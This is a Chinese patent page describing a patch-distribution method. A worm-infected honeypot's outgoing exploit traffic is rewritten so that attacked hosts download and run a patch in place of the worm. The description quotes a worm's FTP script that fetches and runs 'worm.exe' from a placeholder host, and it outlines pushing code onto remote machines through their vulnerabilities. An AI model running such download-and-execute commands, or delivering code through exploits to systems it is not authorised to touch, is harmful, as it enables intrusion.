CN101800754B - 一种补丁分发方法 - Google Patents
一种补丁分发方法 Download PDFInfo
- Publication number
- CN101800754B CN101800754B CN2010101331677A CN201010133167A CN101800754B CN 101800754 B CN101800754 B CN 101800754B CN 2010101331677 A CN2010101331677 A CN 2010101331677A CN 201010133167 A CN201010133167 A CN 201010133167A CN 101800754 B CN101800754 B CN 101800754B
- Authority
- CN
- China
- Prior art keywords
- patch
- honey jar
- jar machine
- distributing
- attack
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
- Information Transfer Between Computers (AREA)
- Computer And Data Communications (AREA)
Abstract
本发明提供一种补丁分发方法,包括下列步骤:1蜜罐机被扫描性蠕虫感染;当蜜罐机作为攻击源攻击其它计算机系统时,用补丁程序替换用于攻击活动的恶意代码,并将补丁程序投递到远程受攻击计算机系统。与现有技术相比,本发明提供了一种利用扫描性蠕虫的传播机制进行补丁分发的方案,能够准确的进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系统安装补丁,同时不会给网络引入新的攻击流量。同时,本发明是一种与现有补丁分发工具相比具有不同机制的补丁分发方案,能够作为对现有补丁分发工具的补充,及时为更多的计算机系统打上相应的补丁。
Description
技术领域
本发明涉及网络安全技术领域,具体地说,本发明涉及一种补丁分发方法。
背景技术
当前,计算机与互联网已经广泛深入到人们日常生活中,成为人们经常使用的工具,而现在的绝大多数个人计算机所用的操作系统和应用软件都包含系统漏洞或软件漏洞。所谓系统漏洞,是操作系统自身的漏洞,这些漏洞在安装了操作系统后或者安装了系统补丁后都可能存在或新产生;所谓软件漏洞,是用户在操作系统上安装软件后引入的漏洞,比如中国常用的聊天软件QQ、MSN,邮件软件Foxmail、Outlook Express,媒体播放软件暴风影音、千千静听等,都存在可被恶意代码利用的软件漏洞,其中有些漏洞已经被大规模利用实施恶意攻击。
近年来,对操作系统漏洞的利用数量比较平稳,而对软件漏洞的利用则呈递增趋势。特别是对浏览器软件(如微软的IE7)漏洞的利用,更是广泛存在。例如,网站挂马就是利用了浏览器漏洞,或者浏览器嵌入的软件(如媒体播放器)漏洞而入侵用户计算机系统的攻击行为。
消除漏洞的根本办法就是安装软件补丁。如何有效地分发补丁,是众多网络安全管理人员所面临的一个重要任务。以微软(Windows操作系统生产商)为例,其各种系统安全补丁几乎每周都会出现,而具有大面积客户端的网络靠手工进行补丁升级是不现实的,一般的用户本身也不具有为系统打补丁的意识,很多用户本身也不知道需要安装哪些补丁,甚至更有部分用户无法独立安装操作系统补丁,这些都已经造成网络中的客户端出现安全漏洞,成为安全隐患。鉴于补丁分发存在难度,微软推出了SUS、WSUS和SMS等补丁分发工具,这些工具提供了相对牢固的补丁和更新支持,但是存在一个致命性的弱点:一旦补丁分发客户端程序被恶意代码关闭,则失去了自动下载补丁的功能。
综上所述,计算机系统受到网络攻击的重要原因是存在漏洞,如果能够为用户系统及时地打上新补丁,则会有效降低被攻击成功的概率。在最短的时间内安装补丁将会极大地保护网络和其所承载的机密,同时也可以使更少的用户免受蠕虫的侵袭。对于机器众多的用户,繁杂的手工补丁安装已经不能适应大规模网络的管理,而SUS、WSUS和SMS等补丁分发工具本身易于成为恶意代码的攻击目标,因此它们并不能确保计算机系统的安全。因此,当前还迫切需要依靠新的技术手段来实现对操作系统的漏洞自动修补方案,以作为对现有补丁分发工具的补充,及时为更多的计算机系统打上相应的补丁。
发明内容
本发明的目的是提供一种具有全新机制的补丁分发方案,以作为对现有补丁分发工具的补充,及时为更多的存在漏洞的计算机系统打上相应的补丁。
为实现上述发明目的,本发明提供了一种补丁分发方法,包括下列步骤:
1)蜜罐机被扫描性蠕虫感染;
2)蜜罐机作为攻击源攻击其它计算机系统;
3)用补丁程序替换用于攻击活动的恶意代码;
4)将补丁程序投递到远程受攻击计算机系统。
其中,所述步骤2)还包括:蜜罐机作为攻击源随机向远程主机发送攻击报文,远程主机执行攻击报文的代码,打开命令通道。
其中,所述步骤3)还包括:拦截并检测蜜罐机发送出去的报文,当报文中包含恶意代码时,用相应补丁程序替换所述恶意代码。
其中,所述步骤3)还包括:蜜罐机上的驱动程序拦截并检测蜜罐机发送出去的所有报文,当发现从蜜罐机发出的报文中含有“下载蠕虫文件命令”时,将“下载蠕虫文件命令”替换为“下载补丁文件命令”。
其中,所述步骤4)还包括:蜜罐机以所述扫描性蠕虫的攻击机制将所述补丁程序复制到受攻击计算机系统,并使受攻击计算机系统运行所述补丁程序。
其中,所述步骤4)包括下列子步骤:
41)蜜罐机向远程主机打开的命令通道发送替换后的攻击报文;
42)远程主机收到替换后的攻击报文后,从蜜罐机下载并运行补丁。
其中,所述蜜罐机安装有防火墙软件并设置防火墙规则以拦截蜜罐机发往非授权IP地址段的报文。
其中,所述蜜罐机上拷贝一个或多个重要漏洞的补丁安装文件。
其中,所述步骤4)中,所述蜜罐机为所述远程受攻击计算机系统提供补丁安装文件下载服务。
其中,所述蜜罐机为所述远程受攻击计算机系统提供FTP、TFTP或HTTP下载服务。
与现有技术相比,本发明提供了一种利用扫描性蠕虫的传播机制进行补丁分发的方案,能够准确的进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系统安装补丁,同时不会给网络引入新的攻击流量。同时,本发明是一种与现有补丁分发工具相比具有不同机制的补丁分发方案,能够作为对现有补丁分发工具的补充,及时为更多的计算机系统打上相应的补丁。
附图说明
图1示出了扫描性蠕虫的传播流程示意图;
图2示出了本发明一个实施例的补丁分发流程示意图。
具体实施方式
以下,结合附图和实施例本发明做进一步的详细说明。
根据本发明的一个实施例,提供了一种利用蜜罐技术的补丁分发方法,该方法通过替换蜜罐向外发出的攻击报文内容,将有害的恶意代码投递替换为有益的与漏洞相关的补丁投递,并在远程主机上运行,从而实现了有针对性的补丁分发。通过这种方法,可以及时为存在漏洞的主机打上补丁,又不会为网络引入新的攻击流量。
扫描性蠕虫是攻击漏洞的典型恶意代码,本实施例需要利用扫描性蠕虫的攻击机制进行补丁投递。主流扫描性蠕虫的传播步骤如图1所示。
步骤一:攻击源主机上的蠕虫随机生成一个待攻击的目标IP地址A,向A发送攻击报文(Shellcode1),A上包含漏洞的程序收到攻击报文后,会执行Shellcode1代码,打开命令通道,等待执行攻击源发来的后续命令;
步骤二:蠕虫向A打开的命令通道发送命令,使A从蜜罐机下载蠕虫并运行;
步骤三:A上含漏洞的程序试图从攻击源下载蠕虫并执行,蠕虫打开的Ftp/Tftp服务程序为A提供下载;
步骤四:蠕虫打开的Ftp/Tftp服务并将自身复制到A,A运行蠕虫,成为新的攻击源。
下面对本实施例做更加详细的描述。
依据本实施例构建的补丁分发系统包括两部分,第一部分是蜜罐机,第二部分是驱动程序,所述驱动程序可以安装在所述蜜罐机上。下面分别描述本实施例的蜜罐机和驱动程序。
1.用于捕获恶意代码的蜜罐机H
蜜罐是一种安全资源,它是网络安全人员主动设置的一种特殊的存在漏洞的主机,其作用在于被扫描、攻击和攻陷,并通过对所有流入/流出蜜罐的网络流量的监视和分析,达到对网络攻击活动进行监视、检测和分析的目的。蜜罐一般可分为被动蜜罐和主动蜜罐,被动蜜罐被动等待被攻击,主动蜜罐主动对外访问危险资源。本实施例采用的是被动蜜罐,该蜜罐被动等待被扫描性蠕虫攻击。
本实施例的蜜罐机可采用Windows或Linux系统,它们原理类似。下面将以Windows系统为例说明构造蜜罐机H的方法。该蜜罐机需要安装好操作系统、接入互联网、设置公网IP地址、配置防火墙、安装一个或多个常用软件、运行蜜罐程序(蜜罐机上运行的、用于模拟漏洞与攻击源交互的程序,该程序让远程攻击源认为本系统存在漏洞且可以攻击成功),然后等待被扫描性蠕虫攻击。
本实施例中,可按下列步骤准备蜜罐机。
步骤一:准备一台安装Windows XP的主机作为蜜罐机;
步骤二:在安装好操作系统的蜜罐机上安装一个或多个常用的应用软件,如IIS、MySQL、MSN等;
步骤三:在蜜罐机上安装防火墙软件,设置防火墙规则,拦截蜜罐机发往非授权IP地址段的报文;本步骤目的是提供一种灵活的管理策略,使管理员可以禁止蜜罐机扫描某些主机。蜜罐机扫描非本网主机是非法的,但蜜罐机可以扫描本单位特定网段的主机。
步骤四:在蜜罐机上安装和使用漏洞检测软件(如360安全卫士)确认蜜罐机存在多个系统漏洞和应用软件漏洞;
步骤五:从蜜罐机以外的其他联网主机上访问蜜罐机,确认其网络连接正常;
步骤六:在蜜罐机上拷贝一个或多个重要漏洞的补丁安装文件(可执行文件格式);
步骤七:在蜜罐机上安装驱动程序D(驱动程序D的详细内容将在下文中描述,因此这里不作赘述),用于修改有害报文内容;
步骤八:在蜜罐机上安装Ftp/Tftp服务软件,将补丁放在根目录供下载。
2.用于修改有害报文内容的驱动程序D
驱动程序D运行在蜜罐机H上,具有系统级别的权限。D采用拦截并转发报文的方式监控从蜜罐机H发出的所有IPv4报文。需要说明,拦截转发报文不同于旁路监听报文,前者可以修改报文内容,而后者只能观察报文内容。当D发现了H发出的报文C中包含了可疑的从蜜罐机H下载文件的通信内容(即恶意代码投递命令,如get worm.exe),,就将该内容替换(如替换为get patch.exe),使得远程主机从H下载的文件并不是原有的可疑恶意代码M(如worm.exe),而是特定的补丁程序P(如patch.exe),补丁程序P利用报文C的原有机制运行被投递到远程主机。
驱动程序D可按下列步骤编写。
步骤一:编写网络流量过滤驱动程序,截获流经蜜罐机上所有IPv4报文;
步骤二:编写监控蜜罐机H的驱动程序。对于每个流出蜜罐机的报文,如果包含ftp-n-s或者tftp.exe-i,则将get、rundll32或可执行文件名(如worm.exe)替换为补丁程序P的文件名(如patch.exe)。例如:从蜜罐机发往存在漏洞的目标机V的报文内容如下:
echo open IP Port>x
&echo user 11>>x
&echo get worm.exe>>x
&echo bye>>x
&ftp.exe-n-s:x
&worm.exe
&exit\r\n
则驱动程序D将其中worm.exe替换为patch.exe,从而使得V连接到蜜罐机并下载patch.exe并运行。需要说明,报文内容的变化形式很多,但一般会在ftp-n-s和tftp.exe-i中选择其中一个。当然,某些情况下,也存在利用HTTP服务下载蠕虫的情况,其原理与FTP和TFTP相同,只需对驱动程序的相应代码做适当调整即可,这里不再赘述。
而是否存在rundll32取决于蠕虫文件格式,如果是exe格式则不需要rundll32,如果是dll格式则需要,在替换报文内容时需要逐一分情况判断,这是本领域技术人员所公知的知识,这里不作赘述。
图2示出了本实施例中进行补丁分发的流程示意图,该补丁分发方法基于上述补丁分发系统实现,具体包括下列步骤:
步骤一:蜜罐机H被扫描型蠕虫攻陷后,转变为攻击源。作为攻击源,蜜罐机H随机生成一个待攻击的目标IP地址A,向A发送攻击报文(Shellcode1),地址A的远程主机V上包含漏洞的程序收到攻击报文后,会执行Shellcode1代码,打开命令通道;
步骤二:蜜罐机上的驱动程序D发现从蜜罐机H发出的报文中含有“下载蠕虫文件命令”时,将“下载蠕虫文件命令”替换为“下载补丁文件命令(Shellcode2)”;
步骤三:蜜罐机向远程主机V打开的命令通道发送命令,使远程主机V从蜜罐机下载补丁并运行;
步骤四:远程主机V上含漏洞的程序从蜜罐机下载补丁,蜜罐机一直打开的Ftp/Tftp服务程序为远程主机V提供下载;
步骤五:远程主机V运行补丁。
本实施例的补丁分发工具可以为在一个管理域的网络提供一种内部使用的补丁自动分发方法。相对于现有技术,本实施例只需在网络内布置一台蜜罐机,便可以向多台其他主机投递补丁;此时,对于一个网络内的计算机系统,即使用户关闭了自动更新机制(或者被恶意代码关闭),也未安装任何补丁分发客户端,该计算机系统仍然有机会获得补丁。
本实施例针对扫描性蠕虫的传播原理,利用扫描性蠕虫的传播机制,能够准确的进行补丁分发并即时运行,能够及时地有针对性地为网络中的计算机系统安装补丁,同时不会给网络引入新的攻击流量。
最后所应说明的是,以上实施例仅用以说明本发明的技术方案而非限制。尽管参照实施例对本发明进行了详细说明,本领域的普通技术人员应当理解,对本发明的技术方案进行修改或者等同替换,都不脱离本发明技术方案的精神和范围,其均应涵盖在本发明的权利要求范围当中。
Claims (10)
1.一种补丁分发方法,包括下列步骤:
1)蜜罐机被扫描性蠕虫感染;
2)蜜罐机作为攻击源攻击其它计算机系统;
3)用补丁程序替换用于攻击活动的恶意代码;
4)将补丁程序投递到远程受攻击计算机系统。
2.根据权利要求1所述的补丁分发方法,其特征在于,所述步骤2)还包括:蜜罐机作为攻击源随机向远程主机发送攻击报文,远程主机执行攻击报文的代码,打开命令通道。
3.根据权利要求1所述补丁分发方法,其特征在于,所述步骤3)还包括:拦截并检测蜜罐机发送出去的报文,当报文中包含恶意代码时,用相应补丁程序替换所述恶意代码。
4.根据权利要求3所述的补丁分发方法,其特征在于,所述步骤3)还包括:蜜罐机上的驱动程序拦截并检测蜜罐机发送出去的所有报文,当发现从蜜罐机发出的报文中含有“下载蠕虫文件命令”时,将“下载蠕虫文件命令”替换为“下载补丁文件命令”。
5.根据权利要求2所述的补丁分发方法,其特征在于,所述步骤4)还包括:蜜罐机以所述扫描性蠕虫的攻击机制将所述补丁程序复制到受攻击计算机系统,并使受攻击计算机系统运行所述补丁程序。
6.根据权利要求5所述的补丁分发方法,其特征在于,所述步骤4)包括下列子步骤:
41)蜜罐机向远程主机打开的命令通道发送替换后的攻击报文;
42)远程主机收到替换后的攻击报文后,从蜜罐机下载并运行补丁。
7.根据权利要求1所述的补丁分发方法,其特征在于,所述蜜罐机安装有防火墙软件并设置防火墙规则以拦截蜜罐机发往非授权IP地址段的报文。
8.根据权利要求1所述的补丁分发方法,其特征在于,所述蜜罐机上拷贝一个或多个重要漏洞的补丁安装文件。
9.根据权利要求8所述的补丁分发方法,其特征在于,所述步骤4)中,所述蜜罐机为所述远程受攻击计算机系统提供补丁安装文件下载服务。
10.根据权利要求9所述的补丁分发方法,其特征在于,所述蜜罐机为所述远程受攻击计算机系统提供FTP、TFTP或HTTP下载服务。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2010101331677A CN101800754B (zh) | 2010-03-25 | 2010-03-25 | 一种补丁分发方法 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2010101331677A CN101800754B (zh) | 2010-03-25 | 2010-03-25 | 一种补丁分发方法 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN101800754A CN101800754A (zh) | 2010-08-11 |
| CN101800754B true CN101800754B (zh) | 2012-11-21 |
Family
ID=42596245
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2010101331677A Active CN101800754B (zh) | 2010-03-25 | 2010-03-25 | 一种补丁分发方法 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN101800754B (zh) |
Families Citing this family (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| TWI435235B (zh) | 2010-11-04 | 2014-04-21 | Inst Information Industry | 電腦蠕蟲治療系統以及方法以及儲存電腦蠕蟲治療方法之電腦可讀取記錄媒體 |
| CN102467631B (zh) * | 2010-11-17 | 2014-12-17 | 财团法人资讯工业策进会 | 计算机蠕虫治疗系统以及方法 |
| CN103065090B (zh) * | 2012-12-20 | 2016-03-23 | 广东欧珀移动通信有限公司 | 一种应用程序恶意广告拦截方法及装置 |
| US10303878B2 (en) * | 2016-01-22 | 2019-05-28 | Yu-Liang Wu | Methods and apparatus for automatic detection and elimination of functional hardware trojans in IC designs |
| CN111859405A (zh) * | 2020-07-31 | 2020-10-30 | 深信服科技股份有限公司 | 一种威胁免疫框架、方法、设备及可读存储介质 |
| CN114244610B (zh) * | 2021-12-17 | 2024-05-03 | 山石网科通信技术股份有限公司 | 一种文件传输方法、装置,网络安全设备及存储介质 |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN100493085C (zh) * | 2005-07-08 | 2009-05-27 | 清华大学 | P2p蠕虫防御系统 |
-
2010
- 2010-03-25 CN CN2010101331677A patent/CN101800754B/zh active Active
Also Published As
| Publication number | Publication date |
|---|---|
| CN101800754A (zh) | 2010-08-11 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11310262B1 (en) | Real-time vulnerability monitoring | |
| US20210029156A1 (en) | Security monitoring system for internet of things (iot) device environments | |
| US10893066B1 (en) | Computer program product and apparatus for multi-path remediation | |
| US11165797B2 (en) | Detecting endpoint compromise based on network usage history | |
| US10104110B2 (en) | Anti-vulnerability system, method, and computer program product | |
| US10986109B2 (en) | Local proxy detection | |
| US7805752B2 (en) | Dynamic endpoint compliance policy configuration | |
| EP3654582B1 (en) | Method and system for secure delivery of information to computing environments | |
| US8949987B2 (en) | Computer security process monitor | |
| US7797752B1 (en) | Method and apparatus to secure a computing environment | |
| US20170310703A1 (en) | Detecting triggering events for distributed denial of service attacks | |
| US7490353B2 (en) | Data transfer security | |
| CN101800754B (zh) | 一种补丁分发方法 | |
| US8869270B2 (en) | System and method for implementing content and network security inside a chip | |
| CN105183504B (zh) | 基于软件服务器的进程白名单更新方法 | |
| US9118711B2 (en) | Anti-vulnerability system, method, and computer program product | |
| US9118708B2 (en) | Multi-path remediation | |
| US9118709B2 (en) | Anti-vulnerability system, method, and computer program product | |
| GB2574283A (en) | Detecting triggering events for distributed denial of service attacks | |
| US20220417255A1 (en) | Managed detection and response system and method based on endpoints | |
| US20190109824A1 (en) | Rule enforcement in a network | |
| US9350752B2 (en) | Anti-vulnerability system, method, and computer program product | |
| US10757133B2 (en) | Method and system for creating and deploying virtual assets | |
| GB2621237A (en) | Traffic scanning with context-aware threat signatures | |
| US20230319093A1 (en) | Containerized network activity filtering |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant |